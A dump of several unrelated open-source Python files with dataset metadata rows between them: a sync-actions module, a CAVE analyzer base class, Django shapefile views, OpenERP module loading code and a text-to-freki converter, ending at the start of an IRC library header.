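#     sync(storage_a, storage_b, status,
#          conflict_resolution='a wins',  # side a's version wins every conflict
#          partial_sync='revert')         # revert changes made against a read-only side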
class Action:
def _run_impl(self, a, b): # pragma: no cover
raise NotImplementedError()
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
if self.dest.storage.read_only:
if partial_sync == 'error':
raise PartialSync(self.dest.storage)
elif partial_sync == 'ignore':
self.rollback(a, b)
return
else:
assert partial_sync == 'revert'
self._run_impl(a, b)
@contextlib.contextmanager
def auto_rollback(self, a, b):
try:
yield
except BaseException as e:
self.rollback(a, b)
raise e
def rollback(self, a, b):
a.status.parent.rollback(self.ident)
class Upload(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
href = etag = None
else:
sync_logger.info(u'Copying (uploading) item {} to {}'
.format(self.ident, self.dest.storage))
href, etag = self.dest.storage.upload(self.item)
assert href is not None
self.dest.status.insert_ident(self.ident, ItemMetadata(
href=href,
hash=self.item.hash,
etag=etag
))
class Update(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
meta = ItemMetadata(hash=self.item.hash)
else:
sync_logger.info(u'Copying (updating) item {} to {}'
.format(self.ident, self.dest.storage))
meta = self.dest.status.get_new(self.ident)
meta.etag = \
self.dest.storage.update(meta.href, self.item, meta.etag)
self.dest.status.update_ident(self.ident, meta)
class Delete(Action):
def __init__(self, ident, dest):
self.ident = ident
self.dest = dest
def _run_impl(self, a, b):
meta = self.dest.status.get_new(self.ident)
if not self.dest.storage.read_only:
sync_logger.info(u'Deleting item {} from {}'
.format(self.ident, self.dest.storage))
self.dest.storage.delete(meta.href, meta.etag)
self.dest.status.remove_ident(self.ident)
class ResolveConflict(Action):
def __init__(self, ident):
self.ident = ident
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
sync_logger.info(u'Doing conflict resolution for item {}...'
.format(self.ident))
meta_a = a.status.get_new(self.ident)
meta_b = b.status.get_new(self.ident)
if meta_a.hash == meta_b.hash:
sync_logger.info(u'...same content on both sides.')
elif conflict_resolution is None:
raise SyncConflict(ident=self.ident, href_a=meta_a.href,
href_b=meta_b.href)
elif callable(conflict_resolution):
item_a = a.get_item_cache(self.ident)
item_b = b.get_item_cache(self.ident)
new_item = conflict_resolution(item_a, item_b)
if new_item.hash != meta_a.hash:
Update(new_item, a).run(a, b, conflict_resolution,
partial_sync)
if new_item.hash != meta_b.hash:
Update(new_item, b).run(a, b, conflict_resolution,
partial_sync)
else:
raise UserError('Invalid conflict resolution mode: {!r}'
.format(conflict_resolution))
def _get_actions(a_info, b_info):
for ident in uniq(itertools.chain(a_info.status.parent.iter_new(),
a_info.status.parent.iter_old())):
a = a_info.status.get_new(ident)
b = b_info.status.get_new(ident)
if a and b:
a_changed = a_info.is_changed(ident)
b_changed = b_info.is_changed(ident)
if a_changed and b_changed:
# item was modified on both sides
# OR: missing status
yield ResolveConflict(ident)
elif a_changed and not b_changed:
# item was only modified in a
yield Update(a_info.get_item_cache(ident), b_info)
elif not a_changed and b_changed:
# item was only modified in b
yield Update(b_info.get_item_cache(ident), a_info)
elif a and not b:
if a_info.is_changed(ident):
# was deleted from b but modified on a
# OR: new item was created in a
yield Upload(a_info.get_item_cache(ident), b_info)
else:
# was deleted from b and not modified on a
yield Delete(ident, a_info)
elif not a and b:
if b_info.is_changed(ident):
# was deleted from a but modified on b
# OR: new item was created in b
yield Upload(b_info.get_item_cache(ident), a_info)
else:
# was deleted from a and not changed on b
yield Delete(ident, b_info)
| mit | -1,180,072,998,141,565,400 | 34.91411 | 78 | 0.562948 | false |
automl/SpySMAC | cave/analyzer/base_analyzer.py | 1 | 5492 | import logging
from collections import OrderedDict
from typing import Tuple
from bokeh.io import output_notebook
from bokeh.plotting import show
from cave.html.html_builder import HTMLBuilder
from cave.reader.runs_container import RunsContainer
from cave.utils.exceptions import Deactivated
class BaseAnalyzer(object):
"""
The base class for analyzing methods. To create a new analyzer, inherit from this class and extend.
If you already have an analyzer, but need a wrapper to call it, also inherit it from this class.
You should overwrite the "get_name"-method.
    Currently the initialization calls the analysis. After the analyzer has run, the results should be saved to the
    member self.result, which is a dictionary with a defined structure.
    The docstring (this part) will be used to display a tooltip / help for the analyzer, so it should be a descriptive
    and concise small paragraph describing the analyzer and its results.
Remember to call super.__init__(runscontainer) in your analyzer's __init__-method. This will initialize the logger,
name and important attributes.
All configurator data is available via the self.runscontainer.
"""
def __init__(self,
runscontainer: RunsContainer,
*args,
**kwargs):
"""
runscontainer: RunsContainer
contains all important information about the configurator runs
"""
self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)
self.name = self.get_name()
self.logger.debug("Initializing %s", self.name)
self.runscontainer = runscontainer
self.result = OrderedDict()
self.error = False
options = self.runscontainer.analyzing_options
if self.name not in options.sections():
self.logger.warning("Please state in the analyzing options whether or not to run this Analyzer "
"(simply add a line to the .ini file containing [{}])".format(self.name))
elif not options[self.name].getboolean('run'):
raise Deactivated("{0} has been deactivated in the options. To enable, just set "
"[{0}][run] = True in the .ini file or pass the appropriate flags.".format(self.name))
self.options = options[self.name]
for k, v in kwargs.items():
if v is not None:
self.options[k] = v
self.logger.debug("{} initialized with options: {}".format(self.name, str(dict(self.options))))
def plot_bokeh(self):
"""
This function should recreate the bokeh-plot from scratch with as little overhead as possible. This is needed to
show the bokeh plot in jupyter AND save it to the webpage. The bokeh plot needs to be recreated to be displayed
        in different outputs for reasons beyond our control. So save all analysis results in the class and simply redo
the plotting with this function.
This function needs to be called if bokeh-plots are to be displayed in notebook AND saved to html-result.
"""
raise NotImplementedError()
def get_html(self, d=None, tooltip=None) -> Tuple[str, str]:
"""General reports in html-format, to be easily integrated in html-code. WORKS ALSO FOR BOKEH-OUTPUT.
Parameters
----------
d: Dictionary
a dictionary that will be later turned into a website
tooltip: string
tooltip to be displayed in report. optional, will overwrite the docstrings that are used by default.
Returns
-------
script, div: str, str
header and body part of html-code
"""
if len(self.result) == 1 and None in self.result:
self.logger.debug("Detected None-key, abstracting away...")
self.result = self.result[None]
if d is not None:
d[self.name] = self.result
d[self.name]['tooltip'] = tooltip if tooltip is not None else self.__doc__
script, div = HTMLBuilder("", "", "").add_layer(None, self.result)
combine = "\n\n".join([script, div])
return combine
def get_jupyter(self):
"""Depending on analysis, this creates jupyter-notebook compatible output."""
bokeh_plots = self.check_for_bokeh(self.result)
if bokeh_plots:
self.logger.warning("Bokeh plots cannot be re-used for notebook if they've already been \"components\"'ed. "
"To be sure, get_jupyter should be overwritten for bokeh-producing analyzers.")
output_notebook()
for bokeh_plot in bokeh_plots:
show(bokeh_plot)
else:
from IPython.core.display import HTML, display
display(HTML(self.get_html()))
@classmethod
def check_for_bokeh(cls, d):
"""
Check if there is bokeh-plots in the output of this analyzer by checking the result-dictionary for the bokeh
keyword.
"""
result = [] # all bokeh models
for k, v in d.items():
if isinstance(v, dict):
res = cls.check_for_bokeh(v)
if res:
result.extend(res)
if k == 'bokeh':
result.append(v)
return result
def get_name(self):
return self.__class__.__name__ # Back-up, can be overwritten, will be used as a name for analysis
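# A minimal subclass sketch (illustrative, not part of this module), following
# the contract from the class docstring: call super().__init__(runscontainer)
# first, run the analysis, and store its output in self.result.
#
#     class MyAnalyzer(BaseAnalyzer):
#         """This docstring becomes the tooltip shown in the report."""
#         def __init__(self, runscontainer):
#             super().__init__(runscontainer)
#             self.result['table'] = "<table>...</table>"
#         def get_name(self):
#             return "My Analyzer"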
| bsd-3-clause | -1,194,562,411,713,696,500 | 44.766667 | 120 | 0.628186 | false |
lizardsystem/lizard5-apps | lizard_rainapp/views.py | 1 | 5811 | # (c) Nelen & Schuurmans. GPL licensed, see LICENSE.rst.
# -*- coding: utf-8 -*-
"""Views for the RainApp, mostly a page to upload new region shapefiles."""
# Python 3 is coming
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import io
import logging
import operator
import os
import shutil
import tempfile
import zipfile
from functools import reduce  # reduce is not a builtin under Python 3
import shapefile
from django.contrib.gis.geos import GEOSGeometry
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views.generic import TemplateView
from django.views.generic import View
from lizard_ui.views import ViewContextMixin
from . import forms
from . import models
logger = logging.getLogger(__name__)
class AdminView(ViewContextMixin, TemplateView):
template_name = "lizard_rainapp/admin.html"
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(AdminView, self).dispatch(request, *args, **kwargs)
def get(self, request):
self.form = forms.UploadShapefileForm()
return super(AdminView, self).get(request)
def post(self, request):
self.form = forms.UploadShapefileForm(
request.POST, request.FILES)
if not self.form.is_valid():
return super(AdminView, self).get(request)
try:
self.save_shape()
finally:
self.form.clean_temporary_directory()
return HttpResponseRedirect(
reverse("lizard_rainapp_admin"))
def get_field(self, feature, fieldname, default=None):
try:
name = self.form.cleaned_data[fieldname]
return feature.GetField(
feature.GetFieldIndex(name.encode('utf8')))
except ValueError:
return default
def save_shape(self):
rainappconfig = self.form.cleaned_data['config']
# First, delete old data
models.GeoObject.objects.filter(
config=rainappconfig).delete()
shape = self.form.open_shapefile()
layer = shape.GetLayer()
num_features = 0
for feature in layer:
geom = feature.GetGeometryRef()
models.GeoObject.objects.create(
municipality_id=self.get_field(feature, 'id_field'),
name=self.get_field(feature, 'name_field'),
x=self.get_field(feature, 'x_field'),
y=self.get_field(feature, 'y_field'),
area=self.get_field(feature, 'area_field'),
geometry=GEOSGeometry(geom.ExportToWkt(), srid=4326),
config=rainappconfig)
num_features += 1
logger.debug("Added {} features.".format(num_features))
def rainapp_configs(self):
return models.RainappConfig.objects.all()
class DownloadShapeView(View):
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(DownloadShapeView, self).dispatch(
request, *args, **kwargs)
def get(self, request, slug):
try:
rainappconfig = models.RainappConfig.objects.get(
slug=slug)
except models.RainappConfig.DoesNotExist:
raise Http404()
if not rainappconfig.has_geoobjects:
raise Http404()
bytebuffer = self.save_data_to_zip(rainappconfig)
# Setup HTTPResponse for returning a zip file
response = HttpResponse(content_type='application/zip')
response['Content-Disposition'] = (
'attachment; filename={}.zip'.format(slug))
response.write(bytebuffer.read())
return response
def save_data_to_zip(self, rainappconfig):
# Save a shapefile to a temp directory
temp_dir = tempfile.mkdtemp()
try:
shapefile_path = os.path.join(
temp_dir, rainappconfig.slug)
shp = shapefile.Writer(shapefile.POLYGON)
shp.field(b'ID_NS')
shp.field(b'ID')
shp.field(b'X', b'F', 11, 5)
shp.field(b'Y', b'F', 11, 5)
shp.field(b'AREA', b'F', 11, 5)
for geo in models.GeoObject.objects.filter(config=rainappconfig):
if str(geo.geometry).startswith('MULTIPOLYGON'):
# For pyshp, multipolygons are basically normal
# polygons with all the parts after each other. Meaning
# we need to add them together them by hand.
geometry = [
[list(l) for l in polygon] for polygon in geo.geometry]
geometry = reduce(operator.add, geometry, [])
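                    # e.g. two polygons [[r1, r2], [r3]] (rings r1..r3)
                    # flatten to [r1, r2, r3], so pyshp writes each ring
                    # as one part of a single polygon record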
else:
geometry = [list(l) for l in geo.geometry]
shp.poly(parts=geometry)
shp.record(
geo.municipality_id,
geo.name,
geo.x,
geo.y,
geo.area)
shp.save(shapefile_path)
# Create a zipfile in a BytesIO buffer
bytebuffer = io.BytesIO()
zipf = zipfile.ZipFile(bytebuffer, 'w', zipfile.ZIP_DEFLATED)
for filename in os.listdir(temp_dir):
zipf.write(os.path.join(temp_dir, filename), filename)
zipf.close()
bytebuffer.seek(0)
return bytebuffer
finally:
# Remove temporary directory
shutil.rmtree(temp_dir)
| lgpl-3.0 | 6,633,258,897,341,782,000 | 31.646067 | 79 | 0.601101 | false |
mrshelly/openerp71313 | openerp/modules/loading.py | 1 | 19716 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Modules (also called addons) management.
"""
import itertools
import logging
import os
import sys
import threading
import openerp
import openerp.modules.db
import openerp.modules.graph
import openerp.modules.migration
import openerp.osv as osv
import openerp.pooler as pooler
import openerp.release as release
import openerp.tools as tools
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
from openerp.modules.module import initialize_sys_path, \
load_openerp_module, init_module_models
_logger = logging.getLogger(__name__)
def open_openerp_namespace():
    # See the comment for openerp.conf.deprecation.open_openerp_namespace.
if openerp.conf.deprecation.open_openerp_namespace:
for k, v in list(sys.modules.items()):
if k.startswith('openerp.') and sys.modules.get(k[8:]) is None:
sys.modules[k[8:]] = v
def load_module_graph(cr, graph, status=None, perform_checks=True, skip_modules=None, report=None):
"""Migrates+Updates or Installs all module nodes from ``graph``
:param graph: graph of module nodes to load
:param status: status dictionary for keeping track of progress
    :param perform_checks: whether module descriptors should be checked for validity (prints warnings
        for some cases)
    :param skip_modules: optional list of module names (packages) which have previously been loaded and can be skipped
    :return: tuple (loaded_modules, processed_modules): the modules that were
        loaded, and the subset that was actually installed or updated
"""
def process_sql_file(cr, fp):
queries = fp.read().split(';')
for query in queries:
new_query = ' '.join(query.split())
if new_query:
cr.execute(new_query)
load_init_xml = lambda *args: _load_data(cr, *args, kind='init_xml')
load_update_xml = lambda *args: _load_data(cr, *args, kind='update_xml')
load_demo_xml = lambda *args: _load_data(cr, *args, kind='demo_xml')
load_data = lambda *args: _load_data(cr, *args, kind='data')
load_demo = lambda *args: _load_data(cr, *args, kind='demo')
def load_test(module_name, idref, mode):
cr.commit()
try:
threading.currentThread().testing = True
_load_data(cr, module_name, idref, mode, 'test')
return True
except Exception:
_logger.exception(
'module %s: an exception occurred in a test', module_name)
return False
finally:
threading.currentThread().testing = False
if tools.config.options['test_commit']:
cr.commit()
else:
cr.rollback()
def _load_data(cr, module_name, idref, mode, kind):
"""
kind: data, demo, test, init_xml, update_xml, demo_xml.
noupdate is False, unless it is demo data or it is csv data in
init mode.
"""
for filename in package.data[kind]:
if kind == 'test':
_logger.log(logging.TEST, "module %s: loading %s", module_name, filename)
else:
_logger.info("module %s: loading %s", module_name, filename)
_, ext = os.path.splitext(filename)
pathname = os.path.join(module_name, filename)
fp = tools.file_open(pathname)
noupdate = False
if kind in ('demo', 'demo_xml'):
noupdate = True
try:
ext = ext.lower()
if ext == '.csv':
if kind in ('init', 'init_xml'):
noupdate = True
tools.convert_csv_import(cr, module_name, pathname, fp.read(), idref, mode, noupdate)
elif ext == '.sql':
process_sql_file(cr, fp)
elif ext == '.yml':
tools.convert_yaml_import(cr, module_name, fp, kind, idref, mode, noupdate, report)
elif ext == '.xml':
tools.convert_xml_import(cr, module_name, fp, idref, mode, noupdate, report)
elif ext == '.js':
pass # .js files are valid but ignored here.
else:
_logger.warning("Can't load unknown file type %s.", filename)
finally:
fp.close()
if status is None:
status = {}
processed_modules = []
loaded_modules = []
pool = pooler.get_pool(cr.dbname)
migrations = openerp.modules.migration.MigrationManager(cr, graph)
_logger.debug('loading %d packages...', len(graph))
# Query manual fields for all models at once and save them on the registry
# so the initialization code for each model does not have to do it
# one model at a time.
pool.fields_by_model = {}
cr.execute('SELECT * FROM ir_model_fields WHERE state=%s', ('manual',))
for field in cr.dictfetchall():
pool.fields_by_model.setdefault(field['model'], []).append(field)
# register, instantiate and initialize models for each modules
for index, package in enumerate(graph):
module_name = package.name
module_id = package.id
if skip_modules and module_name in skip_modules:
continue
_logger.info('module %s: loading objects', package.name)
migrations.migrate_module(package, 'pre')
load_openerp_module(package.name)
models = pool.load(cr, package)
loaded_modules.append(package.name)
if hasattr(package, 'init') or hasattr(package, 'update') or package.state in ('to install', 'to upgrade'):
init_module_models(cr, package.name, models)
pool._init_modules.add(package.name)
status['progress'] = float(index) / len(graph)
# Can't put this line out of the loop: ir.module.module will be
# registered by init_module_models() above.
modobj = pool.get('ir.module.module')
if perform_checks:
modobj.check(cr, SUPERUSER_ID, [module_id])
idref = {}
mode = 'update'
if hasattr(package, 'init') or package.state == 'to install':
mode = 'init'
if hasattr(package, 'init') or hasattr(package, 'update') or package.state in ('to install', 'to upgrade'):
if package.state=='to upgrade':
# upgrading the module information
modobj.write(cr, SUPERUSER_ID, [module_id], modobj.get_values_from_terp(package.data))
load_init_xml(module_name, idref, mode)
load_update_xml(module_name, idref, mode)
load_data(module_name, idref, mode)
if hasattr(package, 'demo') or (package.dbdemo and package.state != 'installed'):
status['progress'] = (index + 0.75) / len(graph)
load_demo_xml(module_name, idref, mode)
load_demo(module_name, idref, mode)
cr.execute('update ir_module_module set demo=%s where id=%s', (True, module_id))
# launch tests only in demo mode, as most tests will depend
# on demo data. Other tests can be added into the regular
# 'data' section, but should probably not alter the data,
# as there is no rollback.
if tools.config.options['test_enable']:
report.record_result(load_test(module_name, idref, mode))
# Run the `fast_suite` and `checks` tests given by the module.
if module_name == 'base':
# Also run the core tests after the database is created.
report.record_result(openerp.modules.module.run_unit_tests('openerp'))
report.record_result(openerp.modules.module.run_unit_tests(module_name))
processed_modules.append(package.name)
migrations.migrate_module(package, 'post')
ver = release.major_version + '.' + package.data['version']
# Set new modules and dependencies
modobj.write(cr, SUPERUSER_ID, [module_id], {'state': 'installed', 'latest_version': ver})
# Update translations for all installed languages
modobj.update_translations(cr, SUPERUSER_ID, [module_id], None)
package.state = 'installed'
for kind in ('init', 'demo', 'update'):
if hasattr(package, kind):
delattr(package, kind)
cr.commit()
# The query won't be valid for models created later (i.e. custom model
# created after the registry has been loaded), so empty its result.
pool.fields_by_model = None
cr.commit()
return loaded_modules, processed_modules
def _check_module_names(cr, module_names):
mod_names = set(module_names)
if 'base' in mod_names:
# ignore dummy 'all' module
if 'all' in mod_names:
mod_names.remove('all')
if mod_names:
cr.execute("SELECT count(id) AS count FROM ir_module_module WHERE name in %s", (tuple(mod_names),))
if cr.dictfetchone()['count'] != len(mod_names):
# find out what module name(s) are incorrect:
cr.execute("SELECT name FROM ir_module_module")
incorrect_names = mod_names.difference([x['name'] for x in cr.dictfetchall()])
_logger.warning('invalid module names, ignored: %s', ", ".join(incorrect_names))
def load_marked_modules(cr, graph, states, force, progressdict, report, loaded_modules, perform_checks):
"""Loads modules marked with ``states``, adding them to ``graph`` and
``loaded_modules`` and returns a list of installed/upgraded modules."""
processed_modules = []
while True:
cr.execute("SELECT name from ir_module_module WHERE state IN %s" ,(tuple(states),))
module_list = [name for (name,) in cr.fetchall() if name not in graph]
graph.add_modules(cr, module_list, force)
_logger.debug('Updating graph with %d more modules', len(module_list))
loaded, processed = load_module_graph(cr, graph, progressdict, report=report, skip_modules=loaded_modules, perform_checks=perform_checks)
processed_modules.extend(processed)
loaded_modules.extend(loaded)
if not processed: break
return processed_modules
def load_modules(db, force_demo=False, status=None, update_module=False):
# TODO status['progress'] reporting is broken: used twice (and reset each
# time to zero) in load_module_graph, not fine-grained enough.
# It should be a method exposed by the pool.
initialize_sys_path()
open_openerp_namespace()
force = []
if force_demo:
force.append('demo')
cr = db.cursor()
try:
if not openerp.modules.db.is_initialized(cr):
_logger.info("init db")
openerp.modules.db.initialize(cr)
tools.config["init"]["all"] = 1
tools.config['update']['all'] = 1
if not tools.config['without_demo']:
tools.config["demo"]['all'] = 1
# This is a brand new pool, just created in pooler.get_db_and_pool()
pool = pooler.get_pool(cr.dbname)
if 'base' in tools.config['update'] or 'all' in tools.config['update']:
cr.execute("update ir_module_module set state=%s where name=%s and state=%s", ('to upgrade', 'base', 'installed'))
# STEP 1: LOAD BASE (must be done before module dependencies can be computed for later steps)
graph = openerp.modules.graph.Graph()
graph.add_module(cr, 'base', force)
if not graph:
_logger.critical('module base cannot be loaded! (hint: verify addons-path)')
raise osv.osv.except_osv(_('Could not load base module'), _('module base cannot be loaded! (hint: verify addons-path)'))
# processed_modules: for cleanup step after install
# loaded_modules: to avoid double loading
report = pool._assertion_report
loaded_modules, processed_modules = load_module_graph(cr, graph, status, perform_checks=update_module, report=report)
if tools.config['load_language']:
for lang in tools.config['load_language'].split(','):
tools.load_language(cr, lang)
# STEP 2: Mark other modules to be loaded/updated
if update_module:
modobj = pool.get('ir.module.module')
if ('base' in tools.config['init']) or ('base' in tools.config['update']):
_logger.info('updating modules list')
modobj.update_list(cr, SUPERUSER_ID)
_check_module_names(cr, itertools.chain(tools.config['init'].keys(), tools.config['update'].keys()))
mods = [k for k in tools.config['init'] if tools.config['init'][k]]
if mods:
ids = modobj.search(cr, SUPERUSER_ID, ['&', ('state', '=', 'uninstalled'), ('name', 'in', mods)])
if ids:
modobj.button_install(cr, SUPERUSER_ID, ids)
mods = [k for k in tools.config['update'] if tools.config['update'][k]]
if mods:
ids = modobj.search(cr, SUPERUSER_ID, ['&', ('state', '=', 'installed'), ('name', 'in', mods)])
if ids:
modobj.button_upgrade(cr, SUPERUSER_ID, ids)
cr.execute("update ir_module_module set state=%s where name=%s", ('installed', 'base'))
# STEP 3: Load marked modules (skipping base which was done in STEP 1)
# IMPORTANT: this is done in two parts, first loading all installed or
# partially installed modules (i.e. installed/to upgrade), to
# offer a consistent system to the second part: installing
# newly selected modules.
# We include the modules 'to remove' in the first step, because
# they are part of the "currently installed" modules. They will
# be dropped in STEP 6 later, before restarting the loading
# process.
states_to_load = ['installed', 'to upgrade', 'to remove']
processed = load_marked_modules(cr, graph, states_to_load, force, status, report, loaded_modules, update_module)
processed_modules.extend(processed)
if update_module:
states_to_load = ['to install']
processed = load_marked_modules(cr, graph, states_to_load, force, status, report, loaded_modules, update_module)
processed_modules.extend(processed)
# load custom models
cr.execute('select model from ir_model where state=%s', ('manual',))
for model in cr.dictfetchall():
pool.get('ir.model').instanciate(cr, SUPERUSER_ID, model['model'], {})
# STEP 4: Finish and cleanup installations
if processed_modules:
cr.execute("""select model,name from ir_model where id NOT IN (select distinct model_id from ir_model_access)""")
for (model, name) in cr.fetchall():
model_obj = pool.get(model)
if model_obj and not model_obj.is_transient():
_logger.warning('The model %s has no access rules, consider adding one. E.g. access_%s,access_%s,model_%s,,1,1,1,1',
model, model.replace('.', '_'), model.replace('.', '_'), model.replace('.', '_'))
# Temporary warning while we remove access rights on osv_memory objects, as they have
# been replaced by owner-only access rights
cr.execute("""select distinct mod.model, mod.name from ir_model_access acc, ir_model mod where acc.model_id = mod.id""")
for (model, name) in cr.fetchall():
model_obj = pool.get(model)
if model_obj and model_obj.is_transient():
_logger.warning('The transient model %s (%s) should not have explicit access rules!', model, name)
cr.execute("SELECT model from ir_model")
for (model,) in cr.fetchall():
obj = pool.get(model)
if obj:
obj._check_removed_columns(cr, log=True)
else:
_logger.warning("Model %s is declared but cannot be loaded! (Perhaps a module was partially removed or renamed)", model)
# Cleanup orphan records
pool.get('ir.model.data')._process_end(cr, SUPERUSER_ID, processed_modules)
for kind in ('init', 'demo', 'update'):
tools.config[kind] = {}
cr.commit()
# STEP 5: Cleanup menus
# Remove menu items that are not referenced by any of other
# (child) menu item, ir_values, or ir_model_data.
# TODO: This code could be a method of ir_ui_menu. Remove menu without actions of children
if update_module:
while True:
cr.execute('''delete from
ir_ui_menu
where
(id not IN (select parent_id from ir_ui_menu where parent_id is not null))
and
(id not IN (select res_id from ir_values where model='ir.ui.menu'))
and
(id not IN (select res_id from ir_model_data where model='ir.ui.menu'))''')
cr.commit()
if not cr.rowcount:
break
else:
_logger.info('removed %d unused menus', cr.rowcount)
# STEP 6: Uninstall modules to remove
if update_module:
# Remove records referenced from ir_model_data for modules to be
# removed (and removed the references from ir_model_data).
cr.execute("SELECT id FROM ir_module_module WHERE state=%s", ('to remove',))
mod_ids_to_remove = [x[0] for x in cr.fetchall()]
if mod_ids_to_remove:
pool.get('ir.module.module').module_uninstall(cr, SUPERUSER_ID, mod_ids_to_remove)
# Recursive reload, should only happen once, because there should be no
# modules to remove next time
cr.commit()
_logger.info('Reloading registry once more after uninstalling modules')
return pooler.restart_pool(cr.dbname, force_demo, status, update_module)
if report.failures:
_logger.error('At least one test failed when loading the modules.')
else:
_logger.info('Modules loaded.')
# STEP 7: call _register_hook on every model
for model in pool.models.values():
model._register_hook(cr)
finally:
cr.close()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,239,214,771,103,827,000 | 44.116705 | 145 | 0.590028 | false |
xigt/freki | freki/text2freki.py | 1 | 6059 | from freki.serialize import FrekiDoc, FrekiBlock, FrekiLine
import codecs
import re
import chardet
import logging
import argparse
def run(args):
frek = read_and_convert(args.infile, args.igtfile, args.encoding, args.detect)
out = open(args.outfile, 'w', encoding='utf8')
out.write(str(frek))
def convert_text(doc_id, text, span_text=None):
"""
Convert a string to freki
:param doc_id: name of document
:param text: text of document
:param span_text: text identifying IGT spans, if available
:return: freki object
"""
w_index = 1
wo_index = 1
pre2post = {}
for line in re.split('\r\n|\n', text):
if not re.match('^\s*$', line):
pre2post[w_index] = wo_index
wo_index += 1
w_index += 1
line_dict = {}
s_index = 0
if span_text:
for line in span_text.split('\n'):
if len(line):
parts = line.split()
tags = parts[2:]
start = int(parts[0])
for i in range(start, int(parts[1]) + 1):
try:
num = pre2post[i]
except KeyError:
print("Warning: a line specified in the igt file is a blank line in the document. "
"Check the line numbers in the igt file. Skipping the problem line.")
break
                    line_dict[num] = (tags[i - start], 's' + str(s_index))
s_index += 1
frek = FrekiDoc()
text = re.sub(r'(\r\n|\n){2,}', '\n\n', text)
blocks = re.split('\n\n', text)
index = 1
b_index = 1
for para in blocks:
lines = re.split('\r\n|\n', para)
linenos = []
for line in lines:
f_line = FrekiLine(line)
f_line.attrs['line'] = index
linenos.append(index)
if index in line_dict:
f_line.attrs['tag'] = line_dict[index][0]
f_line.attrs['span_id'] = line_dict[index][1]
frek.add_line(f_line)
index += 1
block = FrekiBlock(linenos, linenos[0], linenos[-1], frek)
block._attrs['page'] = '1'
block._attrs['block_id'] = 'b' + str(b_index)
block._attrs['doc_id'] = doc_id
b_index += 1
frek.add_block(block)
return frek
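# A minimal, hypothetical sanity check for convert_text (not part of the
# original module):
#
#   frek = convert_text('doc1', 'line one\nline two\n\nline three')
#   str(frek)  # renders two freki blocks (b1, b2) tagged with doc_id 'doc1'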
def read_and_convert(path, igt_path=None, encoding='utf-8', detect_encoding=False):
"""
Read in a text file and convert it to freki. igt_path file format: startline endline tag1 tag2 ... tagN\n
:param path: path to the text file
:param igt_path: path to the text file containing IGT span info
:param encoding: name of the encoding of the file
:param detect_encoding: setting to true will first detect an encoding rather than using the default.
:return: freki object
"""
name = path.split('/')[-1].split('.')[0]
igt_text = None
if detect_encoding:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('Using encoding: ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet')
else:
try:
text = codecs.open(path, encoding=encoding, errors='strict').read()
if igt_path:
igt_text = codecs.open(igt_path, encoding=encoding).read()
except UnicodeDecodeError:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('The file cannot be read using encoding ' + encoding + '. Instead using ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet\n')
logging.info("If encoding " + p_predict['encoding'] + ' is not correct please specify the encoding as an argument')
logging.info('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
except LookupError:
print('Unknown encoding. If you want the system to automatically detect an encoding set detect_encoding=True')
print('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
raise
frek = convert_text(name, text, igt_text)
return frek
def main(arglist=None):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Convert a plain text file to Freki format",
prog='text-to-freki',
epilog='examples:\n'
' text-to-freki in.txt out.freki --igtfile=igts.txt --detect-encoding=true'
)
parser.add_argument('infile', help='plain text file')
parser.add_argument('outfile', help='path to freki output file')
parser.add_argument('--igtfile', help='plain text file containing igt span info')
parser.add_argument('--encoding', default='utf-8', help='encoding of the input file')
parser.add_argument(
'-d', '--detect-encoding', dest='detect', default=False, help='automatically detects encoding when set to true'
)
parser.add_argument(
'-v', '--verbose',
action='count', dest='verbosity', default=2,
help='increase the verbosity (can be repeated: -vvv)'
)
args = parser.parse_args(arglist)
logging.basicConfig(level=50-(args.verbosity*10))
run(args)
if __name__ == '__main__':
main() | mit | 3,247,367,411,610,069,000 | 41.083333 | 142 | 0.592837 | false |
deadc0de6/pyircbot | libirc.py | 1 | 18336 | # author: deadc0de6
# contact: https://github.com/deadc0de6
#
# python IRC library
#
# Copyright (C) 2015 deadc0de6
# This program is free software; you can redistribute it and/or
